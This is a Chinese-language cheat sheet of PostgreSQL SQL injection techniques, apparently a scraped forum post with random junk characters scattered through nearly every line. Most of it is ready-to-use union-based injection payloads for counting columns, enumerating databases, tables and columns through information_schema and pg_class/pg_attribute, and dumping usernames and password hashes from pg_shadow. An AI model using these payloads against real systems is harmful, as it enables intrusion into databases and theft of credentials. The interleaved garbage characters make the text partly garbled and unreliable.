结合了MSSQL MySQL Oracle的一些特点 Q* f0 a& R3 S. o+ `7 K
支持多语句执行,语句可以没有from postgres用户是超级用户(创始人账户) 只有superuser有copy权限 注释: — , /**/% c+ y3 e9 Q) B# p5 Y |) c
连接符: %20 , + , /**/ 内置函数:4 S) k3 Q2 C# ]" j/ t
current_database() //当前数据库名
$ O$ A9 q. I! ^. Psession_user //会话用户
5 M9 h8 e1 o5 ~9 N1 w/ u' x4 X: rcurrent_user //当前数据库用户 q8 \& G7 c2 Y
user //当前用户, B3 o i- J5 f" F& v
version() //数据库版本 Union注射:, i0 A" D& [* \% o
order by n–
- m+ t5 ~. t& ]' d% Pand 1=2 union select null,null,null–4 A9 R3 Y1 Z6 ~& I# r. ]3 K& \. V
and 1=2 union select ‘beach’,null,null–
/ E( m5 X2 `6 eand 1=2 union select (select version()),null,null– 获取表名,字段名(新版本利用information_schema):
+ I- L0 m6 w" xgroup_concat(table_name). t7 f1 S* ]# h2 I1 a* `6 s) m m) |
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–! d- g' a" Y4 o! t$ A
and 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–
R" L: p/ |: c# z: i" Q8 G(老版本)
6 w8 J/ p" _; ?0 V' spg_class.oid对应pg_attribute.attrelid
2 X9 w' p3 S2 Y# E/ e5 tpg_class.relname表名; J G( k# \6 |/ h2 j( ]
pg_attribute.attname字段名 select relname from pg_class获取表名; C. D$ Y G) m& ?# h, f, ~) G
select oid from pg_class where 条件 获取参数+ \* g6 z; k' O$ Z4 p. ^% S5 f+ C0 [
select attname from pg_attribute where attrelid=’oid的值’ 获取字段名 实战:
$ K1 Z0 V4 P* m% D- j$ Sand 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表9 {, p2 q& Z( D) Z
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–
7 e* V$ n( D: n" [0 O, ?由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136 and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名5 n; [" `! l$ O S; N J
======================================================================
* B* ~( E6 @2 t) b0 Uand 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库
7 z+ m5 }0 z/ b! O* p: h! q2 mand 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码 |